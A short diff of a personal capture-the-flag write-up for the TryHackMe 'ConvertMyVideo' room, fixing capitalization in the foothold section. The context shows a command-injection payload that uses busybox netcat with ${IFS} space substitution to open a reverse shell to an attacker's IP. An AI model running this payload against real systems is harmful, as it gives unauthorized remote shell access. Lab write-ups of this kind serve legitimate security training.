K21-crypt/K21-crypt.github.io/content/writeups/tryhackme/ConvertMyVideo/index.md

 ## Foothold

 And now we can login.
-But I was wondering if we can execute command,can i get shell from that.
+But I was wondering if we can execute command,Can I get shell from that.
 I tried different things but this one worked.
 ```bash
 busybox${IFS}nc${IFS}ip${IFS}9999${IFS}-e${IFS}sh;